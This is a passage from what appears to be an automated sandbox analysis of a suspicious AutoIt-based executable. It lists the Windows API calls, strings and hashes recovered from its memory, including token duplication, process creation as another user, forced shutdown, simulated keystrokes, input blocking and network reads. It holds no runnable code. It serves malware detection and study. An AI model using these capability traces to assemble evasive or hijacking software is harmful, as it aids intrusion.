          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: BuffCharUpper_malloc
          • String ID:
          • API String ID: 1573836695-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          • _memmove.LIBCMT ref: 0115877C
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
          • String ID:
          • API String ID: 620504543-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • FindCloseChangeNotification.KERNELBASE(?,?,01156F2F), ref: 0113D9DD
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: ChangeCloseFindNotification
          • String ID:
          • API String ID: 2591292051-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,01156340,?,011B7AAC,00000003,0113E0B0,?,?,00000001), ref: 01173D58
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: FileWrite
          • String ID:
          • API String ID: 3934441357-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0113E288
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: FilePointer
          • String ID:
          • API String ID: 973152223-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetFileAttributesW.KERNELBASE(?), ref: 01163984
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _doexit.LIBCMT ref: 01141806
            • Part of subcall function 011416BA: __lock.LIBCMT ref: 011416C8
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __lock_doexit
          • String ID:
          • API String ID: 368792745-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __wfsopen
          • String ID:
          • API String ID: 197181222-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 011A262C
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: FolderPath
          • String ID:
          • API String ID: 1514166925-0
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          APIs
          • GetForegroundWindow.USER32 ref: 01164407
          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0116442D
          • IsIconic.USER32 ref: 01164436
          • ShowWindow.USER32(?,00000009), ref: 01164443
          • SetForegroundWindow.USER32(?), ref: 01164451
          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01164468
          • GetCurrentThreadId.KERNEL32 ref: 0116446C
          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0116447A
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 01164489
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0116448F
          • AttachThreadInput.USER32(00000000,?,00000001), ref: 01164498
          • SetForegroundWindow.USER32(00000000), ref: 0116449E
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 011644AD
          • keybd_event.USER32 ref: 011644B6
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 011644C4
          • keybd_event.USER32 ref: 011644CD
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 011644DB
          • keybd_event.USER32 ref: 011644E4
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 011644F2
          • keybd_event.USER32 ref: 011644FB
          • SetForegroundWindow.USER32(00000000), ref: 01164505
          • AttachThreadInput.USER32(00000000,?,00000000), ref: 01164526
          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0116452C
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
          • String ID: Shell_TrayWnd
          • API String ID: 2889586943-2988720461
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 01176294
          • CloseHandle.KERNEL32(?), ref: 011762A6
          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 011762BE
          • GetProcessWindowStation.USER32 ref: 011762D7
          • SetProcessWindowStation.USER32(00000000), ref: 011762E1
          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 011762FD
          • _wcslen.LIBCMT ref: 0117639E
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _wcsncpy.LIBCMT ref: 011763C6
          • LoadUserProfileW.USERENV(?,00000020), ref: 011763DF
          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 011763F9
          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 01176428
          • UnloadUserProfile.USERENV(?,?), ref: 0117645B
          • CloseWindowStation.USER32(00000000), ref: 01176472
          • CloseDesktop.USER32(?), ref: 01176480
          • SetProcessWindowStation.USER32(?), ref: 0117648E
          • CloseHandle.KERNEL32(?), ref: 01176498
          • DestroyEnvironmentBlock.USERENV(?), ref: 011764AF
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
          • String ID: $default$winsta0
          • API String ID: 3324942560-1027155976
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetCurrentProcess.KERNEL32(00000028,?), ref: 011633B3
          • OpenProcessToken.ADVAPI32(00000000), ref: 011633BA
          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 011633CF
          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 011633F3
          • GetLastError.KERNEL32 ref: 011633F9
          • ExitWindowsEx.USER32(?,00000000), ref: 0116341C
          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 0116344B
          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0116345E
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
          • String ID: SeShutdownPrivilege
          • API String ID: 2938487562-3733053543
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01166DB5: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 01166DCF
            • Part of subcall function 01166DB5: GetLastError.KERNEL32(?,00000000,?), ref: 01166DD9
            • Part of subcall function 01166DB5: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 01166DFF
            • Part of subcall function 01166D81: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 01166D9C
          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01176090
          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 011760C4
          • GetLengthSid.ADVAPI32(?), ref: 011760D6
          • GetAce.ADVAPI32(?,00000000,?), ref: 01176113
          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0117612F
          • GetLengthSid.ADVAPI32(?), ref: 01176147
          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01176170
          • CopySid.ADVAPI32(00000000), ref: 01176177
          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 011761A9
          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 011761CB
          • SetUserObjectSecurity.USER32 ref: 011761DE
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
          • String ID:
          • API String ID: 1255039815-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
          • String ID:
          • API String ID: 1737998785-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • CreateToolhelp32Snapshot.KERNEL32 ref: 011A55C2
          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 011A55D2
          • __wsplitpath.LIBCMT ref: 011A55FE
            • Part of subcall function 0114392E: __wsplitpath_helper.LIBCMT ref: 01143970
          • _wcscat.LIBCMT ref: 011A5611
          • __wcsicoll.LIBCMT ref: 011A5635
          • Process32NextW.KERNEL32(00000000,?), ref: 011A5665
          • CloseHandle.KERNEL32(00000000), ref: 011A5674
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
          • String ID:
          • API String ID: 2547909840-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • OleInitialize.OLE32(00000000), ref: 0119C0DC
          • _wcslen.LIBCMT ref: 0119C0EE
          • CreateBindCtx.OLE32(00000000,?), ref: 0119C198
          • MkParseDisplayName.OLE32(?,?,?,?), ref: 0119C1DE
            • Part of subcall function 01181AB8: GetLastError.KERNEL32(?,?,00000000), ref: 01181B16
            • Part of subcall function 01181AB8: VariantCopy.OLEAUT32(?,?), ref: 01181B6E
            • Part of subcall function 01181AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 01181B84
            • Part of subcall function 01181AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 01181B9D
            • Part of subcall function 01181AB8: VariantClear.OLEAUT32(-00000058), ref: 01181C17
          • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0119C284
          • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0119C29E
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
          • String ID:
          • API String ID: 2728119192-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • FindFirstFileW.KERNEL32(?,?), ref: 01182455
          • Sleep.KERNEL32(?), ref: 01182481
          • FindNextFileW.KERNEL32(?,?), ref: 0118255F
          • FindClose.KERNEL32(?), ref: 01182575
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
          • String ID: *.*
          • API String ID: 2786137511-438819550
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __wcsicollmouse_event
          • String ID: DOWN
          • API String ID: 1033544147-711622031
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01194E62: inet_addr.WSOCK32(?), ref: 01194E86
          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 011A6629
          • WSAGetLastError.WSOCK32(00000000), ref: 011A664C
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: ErrorLastinet_addrsocket
          • String ID:
          • API String ID: 4170576061-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetCursorPos.USER32(?), ref: 0118631D
          • ScreenToClient.USER32 ref: 0118633A
          • GetAsyncKeyState.USER32(?), ref: 01186377
          • GetAsyncKeyState.USER32(?), ref: 01186387
          • GetWindowLongW.USER32(?,000000F0), ref: 011863DD
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: AsyncState$ClientCursorLongScreenWindow
          • String ID:
          • API String ID: 3539004672-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 0119F356: IsWindow.USER32(00000000), ref: 0119F386
          • IsWindowVisible.USER32 ref: 011AA322
          • IsWindowEnabled.USER32 ref: 011AA332
          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 011AA33F
          • IsIconic.USER32 ref: 011AA34D
          • IsZoomed.USER32 ref: 011AA35B
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Window$EnabledForegroundIconicVisibleZoomed
          • String ID:
          • API String ID: 292994002-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • IsDebuggerPresent.KERNEL32 ref: 01151EE1
          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01151EF6
          • UnhandledExceptionFilter.KERNEL32(011B43DC), ref: 01151F01
          • GetCurrentProcess.KERNEL32(C0000409), ref: 01151F1D
          • TerminateProcess.KERNEL32(00000000), ref: 01151F24
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
          • String ID:
          • API String ID: 2579439406-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01172654: _wcslen.LIBCMT ref: 01172680
          • CoInitialize.OLE32(00000000), ref: 0119E16E
          • CoCreateInstance.OLE32(011B2A08,00000000,00000001,011B28A8,?), ref: 0119E187
          • CoUninitialize.OLE32 ref: 0119E1A6
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: CreateInitializeInstanceUninitialize_wcslen
          • String ID: .lnk
          • API String ID: 886957087-24824748
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _memmove
          • String ID: U$\
          • API String ID: 4104443479-100911408
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011448E2: __wfsopen.LIBCMT ref: 011448EF
          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 011723D5
            • Part of subcall function 01172252: GetLastError.KERNEL32 ref: 01172268
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: ErrorFileInternetLastRead__wfsopen
          • String ID:
          • API String ID: 127098866-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • BlockInput.USER32(00000001), ref: 0118A378
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: BlockInput
          • String ID:
          • API String ID: 3456056419-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • DeleteObject.GDI32(?), ref: 01189528
          • DeleteObject.GDI32(?), ref: 0118953E
          • DestroyWindow.USER32(?), ref: 01189550
          • GetDesktopWindow.USER32 ref: 0118956E
          • GetWindowRect.USER32 ref: 01189575
          • SetRect.USER32 ref: 0118968B
          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01189699
          • CreateWindowExW.USER32 ref: 011896D5
          • GetClientRect.USER32 ref: 011896E5
          • CreateWindowExW.USER32 ref: 01189728
          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0118974D
          • GetFileSize.KERNEL32(00000000,00000000), ref: 01189768
          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 01189773
          • GlobalLock.KERNEL32 ref: 0118977C
          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0118978B
          • GlobalUnlock.KERNEL32(00000000), ref: 01189792
          • CloseHandle.KERNEL32(00000000), ref: 01189799
          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 011897A6
          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,011B29F8,00000000), ref: 011897BD
          • GlobalFree.KERNEL32 ref: 011897CF
          • CopyImage.USER32 ref: 011897FB
          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 0118981E
          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 01189844
          • ShowWindow.USER32(?,00000004), ref: 01189852
          • CreateWindowExW.USER32 ref: 0118989C
          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 011898B0
          • GetStockObject.GDI32(00000011), ref: 011898BA
          • SelectObject.GDI32(00000000,00000000), ref: 011898C2
          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 011898D2
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 011898DB
          • DeleteDC.GDI32(00000000), ref: 011898E5
          • _wcslen.LIBCMT ref: 01189903
          • _wcscpy.LIBCMT ref: 01189927
          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 011899C8
          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 011899DC
          • GetDC.USER32(00000000), ref: 011899E9
          • SelectObject.GDI32(00000000,?), ref: 011899F9
          • SelectObject.GDI32(00000000,00000007), ref: 01189A24
          • ReleaseDC.USER32 ref: 01189A2F
          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 01189A4C
          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01189A5A
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
          • String ID: $AutoIt v3$DISPLAY$static
          • API String ID: 4040870279-2373415609
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • DestroyWindow.USER32(?), ref: 011890DF
          • SystemParametersInfoW.USER32 ref: 0118919C
          • SetRect.USER32 ref: 011891DC
          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 011891ED
          • CreateWindowExW.USER32 ref: 0118922F
          • GetClientRect.USER32 ref: 0118923B
          • CreateWindowExW.USER32 ref: 0118927D
          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0118928F
          • GetStockObject.GDI32(00000011), ref: 01189299
          • SelectObject.GDI32(00000000,00000000), ref: 011892A1
          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 011892B1
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 011892BA
          • DeleteDC.GDI32(00000000), ref: 011892C3
          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01189309
          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01189321
          • CreateWindowExW.USER32 ref: 0118935B
          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0118936F
          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01189380
          • CreateWindowExW.USER32 ref: 011893B5
          • GetStockObject.GDI32(00000011), ref: 011893C0
          • SendMessageW.USER32(?,00000030,00000000), ref: 011893D0
          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 011893DB
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
          • API String ID: 2910397461-517079104
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetCursorPos.USER32(?,?), ref: 01186625
          • GetDesktopWindow.USER32 ref: 0118663A
          • GetWindowRect.USER32 ref: 01186641
          • GetWindowLongW.USER32(?,000000F0), ref: 01186699
          • GetWindowLongW.USER32(?,000000F0), ref: 011866AC
          • DestroyWindow.USER32(?), ref: 011866BD
          • CreateWindowExW.USER32 ref: 0118670B
          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 01186729
          • SendMessageW.USER32(?,00000418,00000000,?), ref: 0118673D
          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 0118674D
          • SendMessageW.USER32(?,00000421,?,?), ref: 0118676D
          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01186783
          • IsWindowVisible.USER32 ref: 011867A3
          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 011867BF
          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 011867D3
          • GetWindowRect.USER32 ref: 011867EA
          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 01186808
          • GetMonitorInfoW.USER32 ref: 01186820
          • CopyRect.USER32 ref: 01186835
          • SendMessageW.USER32(?,00000412,00000000), ref: 0118688B
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
          • String ID: ($,$tooltips_class32
          • API String ID: 225202481-3320066284
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __wcsicoll$__wcsnicmp
          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
          • API String ID: 790654849-1810252412
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __wcsicoll$IconLoad
          • String ID: blank$info$question$stop$warning
          • API String ID: 2485277191-404129466
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadIconW.USER32 ref: 011845C1
          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 011845D3
          • SetWindowTextW.USER32(?,?), ref: 011845ED
          • GetDlgItem.USER32 ref: 01184605
          • SetWindowTextW.USER32(00000000,?), ref: 0118460C
          • GetDlgItem.USER32 ref: 0118461D
          • SetWindowTextW.USER32(00000000,?), ref: 01184624
          • SendDlgItemMessageW.USER32 ref: 01184646
          • SendDlgItemMessageW.USER32 ref: 01184660
          • GetWindowRect.USER32 ref: 0118466A
          • SetWindowTextW.USER32(?,?), ref: 011846DA
          • GetDesktopWindow.USER32 ref: 011846E4
          • GetWindowRect.USER32 ref: 011846EB
          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01184739
          • GetClientRect.USER32 ref: 01184747
          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 01184771
          • SetTimer.USER32 ref: 011847B4
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
          • String ID:
          • API String ID: 3869813825-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _wcslen.LIBCMT ref: 01194765
          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 01194775
          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0119479D
          • _wcslen.LIBCMT ref: 01194865
          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 01194879
          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 011948A1
          • _wcslen.LIBCMT ref: 011948F7
          • _wcslen.LIBCMT ref: 0119490D
          • _wcslen.LIBCMT ref: 0119492C
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _wcslen$Directory$CurrentSystem
          • String ID: D
          • API String ID: 1914653954-2746444292
          • Opcode ID: 8850a2ed2fa7a9d194bb051c1b3addfd2e635e0095ee6bfafba3afbff7c17ab6
          • Instruction ID: 54d70af8f0c275236fe7a67b7ad1858ccd52a2c90e00c562de78452fa1439be2
          • Opcode Fuzzy Hash: 8850a2ed2fa7a9d194bb051c1b3addfd2e635e0095ee6bfafba3afbff7c17ab6
          • Instruction Fuzzy Hash: AAE1F4715083429FD718EF64C984B2BB7E4AFD8718F04892CF99A87750EB35E845CB92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • __wcsicoll.LIBCMT ref: 01132262
          • __wcsicoll.LIBCMT ref: 01132278
          • __wcsicoll.LIBCMT ref: 0113228E
            • Part of subcall function 011413CB: __wcsicmp_l.LIBCMT ref: 0114144B
          • __wcsicoll.LIBCMT ref: 011322A4
          • _wcscpy.LIBCMT ref: 011322C4
          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\77066510\txoxpdjc.qnr,00000104), ref: 01158AD6
          • _wcscpy.LIBCMT ref: 01158B29
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\77066510\txoxpdjc.qnr$CMDLINE$CMDLINERAW
          • API String ID: 574121520-1560520112
          • Opcode ID: 8fc8b323f93851fddd35a55bd31041e432f1de1de8831c32537b12564066ecb5
          • Instruction ID: c69644fa826d0ebadf24eaa37dd61ce2d8934a66c006849a4d12330ca99a6bbe
          • Opcode Fuzzy Hash: 8fc8b323f93851fddd35a55bd31041e432f1de1de8831c32537b12564066ecb5
          • Instruction Fuzzy Hash: A1717E72D1021B9BDF1CFBA5DC91AEE7B74AFA0348F404068D90577188EBB06949CBE1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 01199155
          • GetFocus.USER32 ref: 01199169
          • GetDlgCtrlID.USER32 ref: 01199174
          • PostMessageW.USER32(?,00000111,?,00000000), ref: 011991C8
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: MessagePost$CtrlFocus
          • String ID: 0
          • API String ID: 1534620443-4108050209
          • Opcode ID: a71c570af9f7edbb6845aae0ed065c8e39d9691e5daa8573b7fe5b1fffd06a84
          • Instruction ID: 8b168c365c7e0d4c345504fb19259bb9dc4333a104318af2e51139998dc9d9c9
          • Opcode Fuzzy Hash: a71c570af9f7edbb6845aae0ed065c8e39d9691e5daa8573b7fe5b1fffd06a84
          • Instruction Fuzzy Hash: C491D6716043199FEB28DF28D884BABB7E8FF84718F04451DF9A597281D770E944CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,01157F37,?,0000138C,?,00000001,?,?,?), ref: 011905F5
          • LoadStringW.USER32(00000000,?,01157F37,?), ref: 011905FC
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
